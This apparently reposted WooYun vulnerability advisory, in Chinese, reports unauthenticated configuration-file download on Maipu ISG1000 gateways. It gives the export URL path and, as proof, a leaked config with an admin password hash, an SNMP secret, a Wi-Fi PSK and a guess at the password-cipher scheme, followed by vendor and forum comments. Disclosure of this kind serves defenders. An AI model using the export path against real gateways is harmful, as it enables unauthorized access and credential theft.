迈普ISG1000系列网关存在权限不当导致信息泄露

admin
admin
admin
140550
文章
117
评论
2015年7月15日13:41:47评论1,348 views字数 239阅读0分47秒阅读模式
摘要

2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-12-20: 细节向核心白帽子及相关领域专家公开
2014-12-30: 细节向普通白帽子公开
2015-01-09: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2014-79924

漏洞标题: 迈普ISG1000系列网关存在权限不当导致信息泄露 迈普ISG1000系列网关存在权限不当导致信息泄露

相关厂商: maipu.cn

漏洞作者: 路人甲

提交时间: 2014-10-21 10:54

公开时间: 2014-12-30 14:44

漏洞类型: 非授权访问/权限绕过

危害等级: 中

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计缺陷/边界绕过 逻辑错误 认证缺陷

0人收藏

漏洞详情

披露状态:

2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-12-20: 细节向核心白帽子及相关领域专家公开
2014-12-30: 细节向普通白帽子公开
2015-01-09: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

rt

详细说明:

根据官网介绍迈普ISG1000系列网关存在9种产品

code 区域 
http://**.**.**.**/productmes.aspx?id=2266

由于权限问题,导致网关配置文件未授权下载,以下利用方式:

code 区域 
https://url/system/maintenance/export.php?type=sc
code 区域 
**.**.**.**/login.html
 **.**.**.**/login.html
 **.**.**.**/login.html

漏洞证明:

<poc>

迈普ISG1000系列网关存在权限不当导致信息泄露

code 区域 
!config
 authorized-table admin
     authorized read all 
     authorized write all 
 !
 user administrator admin local secret Hg6MAD7MGTUEcoT9gHG+LhDc6E07QwG71SmiEodL/fQT/YirzsAURqDjk69469y authorized-table admin  
 user administrator admin authorized-address first **.**.**.**/0
 !
 timezone 57
 !
 !wlan global config
 wlan-global
 wlan country-code default
 wlan channel auto
 wlan max-power default
 wlan radio-type 80211bgn
 wlan enable
 !
 interface bvi1
  ip address **.**.**.**/24
  allow access https
  allow access http
  allow access ping
  allow access ssh
  allow access telnet
 !
 interface eth0
  ip address **.**.**.**/30
  allow access https
  allow access http
  allow access ping
  allow access ssh
  allow access telnet
 !
 interface eth1
  ip address **.**.**.**/30
  allow access https
  allow access http
  allow access ping
  allow access ssh
  allow access telnet
 !
 interface eth2
  bridge-group 1
 !
 interface eth3
  bridge-group 1
 !
 interface eth4
  bridge-group 1
  allow access https
  allow access http
  allow access ping
  allow access ssh
  allow access telnet
 !
 interface eth5
  bridge-group 1
 !
 interface eth6
  bridge-group 1
 !
 interface eth7
  bridge-group 1
 !
 interface eth8
  bridge-group 1
 !
 interface eth9
  bridge-group 1
 !
 interface wlan0
  ssid maipu
  ssid hide disable
  beacon interval default
  client max-count 30
  client isolation disable
  dtim default
  security-mode wpa2
  wpa2 auth-method psk maipu123 encry-method aes
 !
 !address
 !
 address lan
  description neiwang
  ip subnet **.**.**.**/24
 !
 !address-group
 !
 !service
 !
 !service-group
 !
 service-group 常用服务
 !
 service-group 常用服务
  member telnet
  member tcp
  member ping
  member dns
  member icmp
  member https
  member http
 !
 !schedule-day
 !
 !schedule-week
 !
 !schedule-month
 !
 !schedule-once
 !
 !user
 !
 !user-group
 !
 !
 !user-policy
 !
 !
 application-group p2p
  description p2p下载
 application-group 流媒体
  description 流媒体软件
 application-group 网络游戏
 !
 !
 !
 policy any any any any any any p2p always deny 1 
     application 流媒体
     application 网络游戏
 policy any any any any 常用服务 any any always permit 2 
 policy default-action permit 
 !
 snmp
  community secret 6NSjZ2FJfHqUtCqRXdechDETsW7nP4FFcq1ujxx1HotuCZoZGsn14R7gwFVplw1
  syslocation Beijing
 !
 dhcp
  share-net wlan0_dhcps subnet **.**.**.**/24
  share-net wlan0_dhcps **.**.**.** **.**.**.** 0 days 8 hours 0 mins
  share-net wlan0_dhcps gateway **.**.**.**
  share-net wlan0_dhcps dns **.**.**.** **.**.**.**
 !
 !
 router ospf
 !
 !
 ip route **.**.**.**/0 **.**.**.**
 ip route **.**.**.**/0 **.**.**.** 100 weight 100
 !
 !user-param
 !
 !user-webauth
 !
 !user-portal-server
 !
 ip nat source eth0 lan any any interface 1 
 ip nat source eth1 lan any any interface 2 
 !
 !
 !ip session limit
 !
 !
 !
 audit_log database on
 audit_log syslog on
 !
 ip defend port-scan interface eth0 threshold 1000
 ip defend ip-sweep interface eth0 threshold 1000
 ip defend port-scan interface eth1 threshold 1000
 ip defend ip-sweep interface eth1 threshold 1000
 ip defend port-scan interface bvi1 threshold 1000
 ip defend ip-sweep interface bvi1 threshold 1000
 !
 qos-profile line 电信
  limit both
  maxbandwidth ingress 20000
  maxbandwidth egress 20000
  match interface eth0
 !
 qos-profile channel 限速 parent 电信
  bandwidth ingress 2000
  maxbandwidth ingress 20000
  bandwidth egress 2000
  maxbandwidth egress 20000
  perip ingress 2000
  perip egress 2000
  priority high
  match user any
  match application any
 !
 qos-profile channel def_电信 parent 电信
 !
 
 ha-config
 
 !end

密文应该是base64(3des(md5(xxx),keys))

迈普ISG1000系列网关存在权限不当导致信息泄露

</poc>

修复方案:

权限问题,你们懂的。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

漏洞Rank:12 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-26 16:33 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:539 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    1

    @疯狗 @Finger @浩天 看了厂商的洞,都是忽略的(请把厂商注销掉),求补rank

  2. 2014-10-27 14:17 | 疯狗 迈普ISG1000系列网关存在权限不当导致信息泄露 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    0

    @YY-2012 rank已补,关于厂商。 @迈普通信技术股份有限公司 醒醒,醒醒啊,白帽子在给你报告漏洞啊。。。

  3. 2014-10-27 14:19 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:539 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    0

    @疯狗 别激动。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin